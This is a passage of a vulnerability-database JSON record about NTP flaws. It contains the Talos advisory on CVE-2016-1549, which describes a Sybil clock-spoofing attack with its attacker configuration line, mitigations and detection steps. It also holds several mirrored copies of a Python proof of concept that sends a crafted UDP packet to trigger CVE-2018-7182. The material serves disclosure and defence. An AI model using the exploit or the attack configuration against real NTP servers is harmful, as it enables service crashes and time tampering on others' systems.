1 S 2 8 3 0.457 -931554 0.000\r\n sybil 192.168.33.14 2 S 2 8 3 0.644 -931553 0.000\r\n```\r\n\r\nYou can delete any rogue associations by restarting ntpd after applying the mitigations above.\r\nIf you have a compatible IDS product, the following Snort rules detect exploits of this vulnerability: TBD.\r\nAt the network level, multiple symmetric, broadcast, or manycast associations using the same keyid could indicate an attack.\r\n\r\n### TIMELINE\r\n2016-01-19 - CERT reports to NTP", "published": "2017-10-26T00:00:00", "type": "seebug", "title": "Network Time Protocol Ephemeral Association Time Spoofing Vulnerability(CVE-2016-1549)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1549"], "modified": "2017-10-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96788", "id": "SSV:96788", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "talos": [{"lastseen": "2020-07-01T21:25:37", "bulletinFamily": "info", "cvelist": ["CVE-2016-1549"], "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0083\n\n## Network Time Protocol Ephemeral Association Time Spoofing Vulnerability\n\n##### April 26, 2016\n\n##### CVE Number\n\nCVE-2016-1549\n\n### SUMMARY\n\nntpd is vulnerable to Sybil attacks. A malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win ntpd\u2019s clock selection algorithm and modify a victim\u2019s clock.\n\n### TESTED VERSIONS\n\nNTP 4.2.8p3 NTP 4.2.8p4 NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 NTPsec a5fb34b9cc89b92a8fef2f459004865c93bb7f92\n\n### PRODUCT URLS\n\nhttp://www.ntp.org http://www.ntpsec.org\n\n### CVSS SCORE\n\nCVSSv2: 3.5 - (AV:N/AC:M/Au:S/C:N/I:P/A:N) CVSSv3: 5.3 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N\n\n### DETAILS\n\nntpd has the ability to create ephemeral peer associations on the fly in response to certain kinds of incoming requests. 
In most common configurations, if an incoming request will cause a new ephemeral association to be mobilized, ntpd requires the request to be authenticated under a trusted symmetric key. However, ntpd does not enforce any limit on the number of active ephemeral associations that may be created under a single key making ntpd vulnerable to Sybil attacks.\n\nA malicious authenticated peer can use its knowledge of the trusted key that it shares with a victim ntpd process in order to create multiple ephemeral associations with the victim from different source IP addresses. Each of these malicious associations can advertise false time to the victim. If the malicious associations providing consistent false time advertisements outweigh the number of legitimate peer associations, the victim will sync to the time advertised by the attacker.\n\nRFC 5905 does not appear to mandate any specific behavior with regard to authenticating ephemeral associations. Therefore, we recommend that an incoming request only mobilize an ephemeral association if both of the following conditions hold:\n\n * There are no non-preemptible peer associations configured to use that key.\n\nThis prevents ephemeral associations from being created by configured, non-preemptible peers.\n\n * There are no preemptible peer associations authenticated under that key.\n\nThis prevents a malicious ephemeral peer from creating more than one peer association using a given key. 
If the IP address of an ephemeral peer changes, eventually the association will be demobilized at which time a new incoming request can cause a new association to be mobilized with a new IP address.\n\nAn alternative allowing faster failover: when an incoming request will mobilize a new ephemeral association, demobilize all preemptible peer associations authenticated under the key used to authenticate the incoming request before the new association is mobilized.\n\nThis vulnerability has been successfully exploited using symmetric ephemeral associations. However, ephemeral broadcast and manycast associations are also likely to be vulnerable.\n\nTo our knowledge, any ntpd instance configured using the \u2018trustedkey\u2019 directive is vulnerable, as in:\n \n \n keys /etc/ntp.keys\n trustedkey 1 ...\n \n\nThere do not appear to be any other configuration directives that would affect or mitigate this vulnerability. ntpd instances that are not configured with the \u2018trustedkey\u2019 directive are not vulnerable.\n\nThough this vulnerability has only been confirmed against specific releases of NTP and NTPsec, any release of ntp-3 or ntp-4 may be affected.\n\n### ATTACK SCENARIO\n\nTo illustrate this attack, a malicious authenticated ephemeral peer (attacker1) with knowledge of keyid 2 trusted by ntp-client-4.2.8p4 will create multiple malicious ephemeral peer associations with ntp-client-4.2.8p4, overwhelm the victim\u2019s legitimate time sources, and cause ntp-client-4.2.8p4 to modify its clock. We will illustrate this by querying ntp-client-4.2.8p4 for its active peer associations with:\n \n \n ntpq -c lpeer\n \n\nInitially, ntp-client-4.2.8p4 is peered with one legitimate server (ntp-server).\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n *ntp-server .LOCL. 
1 u 5 8 377 0.043 -0.051 0.414\n \n\nAs a proof-of-concept, the attacker will attempt to move the victim\u2019s clock back by an amount just under the panic threshold, 15 minutes in this case. (Significantly larger steps have been achieved with some ntpd releases.) The attacker spins up three attacking nodes at different IP addresses (attacker1..3).\n\nAfter the attacking nodes are well synchronized, the attacker commences the attack by adding the following configuration line to each attacking node instructing it to peer with the victim using keyid 2:\n \n \n peer ntp-client-4.2.8p4 key 2 noselect minpoll 3 maxpoll 3\n \n\nAs a result, we see that ntp-client-4.2.8p4 now has 3 new malicious peers.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n *ntp-server .LOCL. 1 u 3 8 377 0.130 0.479 0.399\n attacker1 .LOCL. 1 S 5 8 1 0.000 0.000 0.000\n attacker2 192.168.33.14 2 S 5 8 1 0.000 0.000 0.000\n attacker3 192.168.33.14 2 S 4 8 1 0.000 0.000 0.000\n \n\nThe attackers consistently provide time advertisements that are about 15 minutes behind the time advertised by the legitimate ntp-server. Because the attackers outnumber legitimate peers, eventually the victim selects an attacker as its system peer indicating that it will synchronize its time to the attackers.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n xntp-server .LOCL. 1 u 1 8 377 0.130 0.479 0.501\n *attacker1 .LOCL. 1 S 2 8 3 0.457 -931554 0.000\n +attacker2 192.168.33.14 2 S 2 8 3 0.644 -931553 0.000\n +attacker3 192.168.33.14 2 S 1 8 3 0.583 -931553 0.000\n \n\nEventually, the victim steps its clock.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n ntp-server .STEP. 16 u - 8 0 0.000 0.000 0.000\n attacker1 .STEP. 
16 S 14 8 0 0.000 0.000 0.000\n attacker2 .STEP. 16 S 52 8 0 0.000 0.000 0.000\n attacker3 .STEP. 16 S 45 8 0 0.000 0.000 0.000\n \n\nAfter stepping the clock, we see that the victim is 931 seconds behind ntp-server confirming the attack.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n *ntp-server .LOCL. 1 u 2 8 1 0.379 931553. 0.317\n attacker1 .STEP. 16 S 19 8 0 0.000 0.000 0.000\n attacker2 .STEP. 16 S 57 8 0 0.000 0.000 0.000\n attacker3 .STEP. 16 S 50 8 0 0.000 0.000 0.000\n \n\nWhile ntp-server is initially selected as the system peer after the clock step, the attacking nodes quickly regain their status as preferred time sources.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n xntp-server .LOCL. 1 u 5 8 3 0.278 931552. 0.638\n *attacker1 .LOCL. 1 S 4 8 6 0.044 -0.346 0.049\n +attacker2 192.168.33.14 2 S 4 8 6 0.593 0.520 0.441\n +attacker3 192.168.33.14 2 S 3 8 6 0.758 0.020 0.074\n \n\nAt this point, the attacker has control of the victim\u2019s clock and can continue to make modifications.\n\n### MITIGATION\n\nThe most complete mitigation is to upgrade to ntp-TBD or NTPsec TBD. If your system\u2019s ntpd is packaged by the system vendor, apply your vendor\u2019s security update as soon as it becomes available.\n\nAdministrators that are not using authenticated NTP can prevent exploitation by removing any unused \u2018trustedkey\u2019 configuration directives from their ntpd configuration file.\n\nIf your system supports a host-based firewall which blocks incoming traffic, such as the Windows Firewall, Mac OS X Application Firewall, or firewalls such as Uncomplicated Firewall or iptables on Linux, you should enable it.\n\nFor other systems, appropriate firewall rules will depend on your environment. 
Use the following recommendations as a guideline:\n\n * NTP clients should block incoming NTP packets from any IP address that is not a known, legitimate peer\n\n * NTP servers should block incoming symmetric active (NTP mode 1), server (NTP mode 4), and broadcast (NTP mode 5) packets from any IP address that is not a known, legitimate peer\n\n### DETECTION\n\nIn most common configurations, you can use ntpq to query the ntpd process running on your system for its list of peers. Any unexpected peers that are not configured in your ntp.conf file could indicate an attack. For example, if your system is configured to be a client of ntp-server and you expect one peer (known-peer), the appearance of additional peers (sybil) could indicate an attack:\n \n \n $ ntpq -c lpeer\n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n *ntp-server .LOCL. 1 u 1 8 377 0.130 0.479 0.501\n known-peer .LOCL. 1 S 2 8 3 0.457 -931554 0.000\n sybil 192.168.33.14 2 S 2 8 3 0.644 -931553 0.000\n \n\nYou can delete any rogue associations by restarting ntpd after applying the mitigations above.\n\nIf you have a compatible IDS product, the following Snort rules detect exploits of this vulnerability: TBD.\n\nAt the network level, multiple symmetric, broadcast, or manycast associations using the same keyid could indicate an attack.\n\n### TIMELINE\n\n2016-01-19 - CERT reports to NTP\n\n##### Credit\n\nDiscovered by Matthew Van Gundy of Cisco ASIG.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2016-0084\n\nPrevious Report\n\nTALOS-2016-0082\n", "edition": 11, "modified": "2016-04-26T00:00:00", "published": "2016-04-26T00:00:00", "id": "TALOS-2016-0083", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0083", "title": "Network Time Protocol Ephemeral Association Time Spoofing Vulnerability", "type": "talos", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], 
"exploitpack": [{"lastseen": "2020-04-01T19:06:02", "description": "\nntpd 4.2.8p10 - Out-of-Bounds Read (PoC)", "edition": 1, "published": "2018-11-14T00:00:00", "title": "ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7182"], "modified": "2018-11-14T00:00:00", "id": "EXPLOITPACK:89AFE2575D3AAEFB0E0D6881A13995A5", "href": "", "sourceData": "# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)\n# Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam\n# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)\n# Website: https://dumpco.re/blog/cve-2018-7182\n# Vendor Homepage: http://www.ntp.org/\n# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p10.tar.gz\n# Version: ntp 4.2.8p6 - 4.2.8p10\n# CVE: CVE-2018-7182\n\n# Note: this PoC exploit only crashes the target when target is ran under a memory sanitiser such as ASan / Valgrind\n#$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf \n#==50079== Memcheck, a memory error detector\n#==50079== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 
\n#==50079== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info\n#==50079== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\n#==50079== \n#12 Nov 09:26:19 ntpd[50079]: ntpd 4.2.8p10@1.3728-o Mon Nov 12 08:21:41 UTC 2018 (4): Starting\n#12 Nov 09:26:19 ntpd[50079]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\n#12 Nov 09:26:19 ntpd[50079]: proto: precision = 1.331 usec (-19)\n#12 Nov 09:26:19 ntpd[50079]: switching logging to file /tmp/ntp.log\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 0 v6wildcard [::]:123\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 1 v4wildcard 0.0.0.0:123\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 2 lo 127.0.0.1:123\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 3 eth0 172.16.193.132:123\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 4 lo [::1]:123\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123\n#12 Nov 09:26:19 ntpd[50079]: Listening on routing socket on fd #22 for interface updates\n#==50079== Invalid read of size 1\n#==50079== at 0x12B8CF: ctl_getitem (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x131BF8: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== Address 0x6c6b396 is 0 bytes after a block of size 6 alloc'd\n#==50079== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\n#==50079== by 0x4C2AFCF: realloc (vg_replace_malloc.c:692)\n#==50079== by 0x17AC63: ereallocz (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x130A5F: add_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 
0x130BC5: set_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x131636: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079==\n\n#!/usr/bin/env python\n\nimport sys\nimport socket\n\nbuf = (\"\\x16\\x0a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x39\\x6e\\x6f\\x6e\\x63\" +\n \"\\x65\\x3d\\x64\\x61\\x33\\x65\\x62\\x35\\x31\\x65\\x62\\x30\\x32\\x38\\x38\\x38\" +\n \"\\x64\\x61\\x32\\x30\\x39\\x36\\x34\\x31\\x39\\x63\\x2c\\x20\\x66\\x72\\x61\\x67\" +\n \"\\x73\\x3d\\x33\\x32\\x2c\\x20\\x6c\\x61\\x64\\x64\\x72\\x00\\x31\\x32\\x37\\x2e\" +\n \"\\x30\\x2e\\x30\\x2e\\x31\\x00\\x00\\x00\")\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(buf, ('127.0.0.1', 123))", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2018-11-16T02:16:00", "description": "", "published": "2018-11-15T00:00:00", "type": "packetstorm", "title": "ntpd 4.2.8p10 Out-Of-Bounds Read ", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7182"], "modified": "2018-11-15T00:00:00", "id": "PACKETSTORM:150341", "href": "https://packetstormsecurity.com/files/150341/ntpd-4.2.8p10-Out-Of-Bounds-Read.html", "sourceData": "`# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC) \n# Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam \n# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) \n# Website: https://dumpco.re/blog/cve-2018-7182 \n# Vendor Homepage: http://www.ntp.org/ \n# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p10.tar.gz \n# Version: ntp 4.2.8p6 - 4.2.8p10 \n# 
CVE: CVE-2018-7182 \n \n# Note: this PoC exploit only crashes the target when target is ran under a memory sanitiser such as ASan / Valgrind \n#$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf \n#==50079== Memcheck, a memory error detector \n#==50079== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. \n#==50079== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info \n#==50079== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf \n#==50079== \n#12 Nov 09:26:19 ntpd[50079]: ntpd 4.2.8p10@1.3728-o Mon Nov 12 08:21:41 UTC 2018 (4): Starting \n#12 Nov 09:26:19 ntpd[50079]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf \n#12 Nov 09:26:19 ntpd[50079]: proto: precision = 1.331 usec (-19) \n#12 Nov 09:26:19 ntpd[50079]: switching logging to file /tmp/ntp.log \n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 0 v6wildcard [::]:123 \n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 1 v4wildcard 0.0.0.0:123 \n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 2 lo 127.0.0.1:123 \n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 3 eth0 172.16.193.132:123 \n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 4 lo [::1]:123 \n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123 \n#12 Nov 09:26:19 ntpd[50079]: Listening on routing socket on fd #22 for interface updates \n#==50079== Invalid read of size 1 \n#==50079== at 0x12B8CF: ctl_getitem (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x131BF8: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== Address 0x6c6b396 is 0 bytes after 
a block of size 6 alloc'd \n#==50079== at 0x4C28C20: malloc (vg_replace_malloc.c:296) \n#==50079== by 0x4C2AFCF: realloc (vg_replace_malloc.c:692) \n#==50079== by 0x17AC63: ereallocz (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x130A5F: add_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x130BC5: set_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x131636: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== \n \n#!/usr/bin/env python \n \nimport sys \nimport socket \n \nbuf = (\"\\x16\\x0a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x39\\x6e\\x6f\\x6e\\x63\" + \n\"\\x65\\x3d\\x64\\x61\\x33\\x65\\x62\\x35\\x31\\x65\\x62\\x30\\x32\\x38\\x38\\x38\" + \n\"\\x64\\x61\\x32\\x30\\x39\\x36\\x34\\x31\\x39\\x63\\x2c\\x20\\x66\\x72\\x61\\x67\" + \n\"\\x73\\x3d\\x33\\x32\\x2c\\x20\\x6c\\x61\\x64\\x64\\x72\\x00\\x31\\x32\\x37\\x2e\" + \n\"\\x30\\x2e\\x30\\x2e\\x31\\x00\\x00\\x00\") \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nsock.sendto(buf, ('127.0.0.1', 123)) \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150341/ntpd428p10-oobread.txt"}], "exploitdb": [{"lastseen": "2018-11-30T12:31:22", "description": "", "published": "2018-11-14T00:00:00", "type": "exploitdb", "title": "ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7182"], "modified": "2018-11-14T00:00:00", "id": "EDB-ID:45846", "href": 
"https://www.exploit-db.com/exploits/45846", "sourceData": "# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)\r\n# Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam\r\n# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)\r\n# Website: https://dumpco.re/blog/cve-2018-7182\r\n# Vendor Homepage: http://www.ntp.org/\r\n# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p10.tar.gz\r\n# Version: ntp 4.2.8p6 - 4.2.8p10\r\n# CVE: CVE-2018-7182\r\n\r\n# Note: this PoC exploit only crashes the target when target is ran under a memory sanitiser such as ASan / Valgrind\r\n#$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf \r\n#==50079== Memcheck, a memory error detector\r\n#==50079== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. \r\n#==50079== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info\r\n#==50079== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\r\n#==50079== \r\n#12 Nov 09:26:19 ntpd[50079]: ntpd 4.2.8p10@1.3728-o Mon Nov 12 08:21:41 UTC 2018 (4): Starting\r\n#12 Nov 09:26:19 ntpd[50079]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\r\n#12 Nov 09:26:19 ntpd[50079]: proto: precision = 1.331 usec (-19)\r\n#12 Nov 09:26:19 ntpd[50079]: switching logging to file /tmp/ntp.log\r\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 0 v6wildcard [::]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 1 v4wildcard 0.0.0.0:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 2 lo 127.0.0.1:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 3 eth0 172.16.193.132:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 4 lo [::1]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listening on routing socket on fd #22 for interface updates\r\n#==50079== Invalid read of size 1\r\n#==50079== at 0x12B8CF: ctl_getitem (in 
/home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x131BF8: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== Address 0x6c6b396 is 0 bytes after a block of size 6 alloc'd\r\n#==50079== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n#==50079== by 0x4C2AFCF: realloc (vg_replace_malloc.c:692)\r\n#==50079== by 0x17AC63: ereallocz (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x130A5F: add_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x130BC5: set_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x131636: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \r\n#==50079==\r\n\r\n#!/usr/bin/env python\r\n\r\nimport sys\r\nimport socket\r\n\r\nbuf = (\"\\x16\\x0a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x39\\x6e\\x6f\\x6e\\x63\" +\r\n \"\\x65\\x3d\\x64\\x61\\x33\\x65\\x62\\x35\\x31\\x65\\x62\\x30\\x32\\x38\\x38\\x38\" +\r\n \"\\x64\\x61\\x32\\x30\\x39\\x36\\x34\\x31\\x39\\x63\\x2c\\x20\\x66\\x72\\x61\\x67\" +\r\n \"\\x73\\x3d\\x33\\x32\\x2c\\x20\\x6c\\x61\\x64\\x64\\x72\\x00\\x31\\x32\\x37\\x2e\" +\r\n \"\\x30\\x2e\\x30\\x2e\\x31\\x00\\x00\\x00\")\r\n\r\nsock = socket.socket(socket.AF_INET, 
socket.SOCK_DGRAM)\r\nsock.sendto(buf, ('127.0.0.1', 123))", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45846"}], "zdt": [{"lastseen": "2018-11-19T19:13:48", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-11-14T00:00:00", "title": "ntpd 4.2.8p10 - Out-of-Bounds Read Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7182"], "modified": "2018-11-14T00:00:00", "id": "1337DAY-ID-31596", "href": "https://0day.today/exploit/description/31596", "sourceData": "# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)\r\n# Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam\r\n# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)\r\n# Website: https://dumpco.re/blog/cve-2018-7182\r\n# Vendor Homepage: http://www.ntp.org/\r\n# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p10.tar.gz\r\n# Version: ntp 4.2.8p6 - 4.2.8p10\r\n# CVE: CVE-2018-7182\r\n \r\n# Note: this PoC exploit only crashes the target when target is ran under a memory sanitiser such as ASan / Valgrind\r\n#$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf \r\n#==50079== Memcheck, a memory error detector\r\n#==50079== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 
\r\n#==50079== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info\r\n#==50079== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\r\n#==50079== \r\n#12 Nov 09:26:19 ntpd[50079]: ntpd 4.2.8p10@1.3728-o Mon Nov 12 08:21:41 UTC 2018 (4): Starting\r\n#12 Nov 09:26:19 ntpd[50079]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\r\n#12 Nov 09:26:19 ntpd[50079]: proto: precision = 1.331 usec (-19)\r\n#12 Nov 09:26:19 ntpd[50079]: switching logging to file /tmp/ntp.log\r\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 0 v6wildcard [::]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 1 v4wildcard 0.0.0.0:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 2 lo 127.0.0.1:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 3 eth0 172.16.193.132:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 4 lo [::1]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listening on routing socket on fd #22 for interface updates\r\n#==50079== Invalid read of size 1\r\n#==50079== at 0x12B8CF: ctl_getitem (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x131BF8: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== Address 0x6c6b396 is 0 bytes after a block of size 6 alloc'd\r\n#==50079== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n#==50079== by 0x4C2AFCF: realloc (vg_replace_malloc.c:692)\r\n#==50079== by 0x17AC63: ereallocz (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x130A5F: add_var (in 
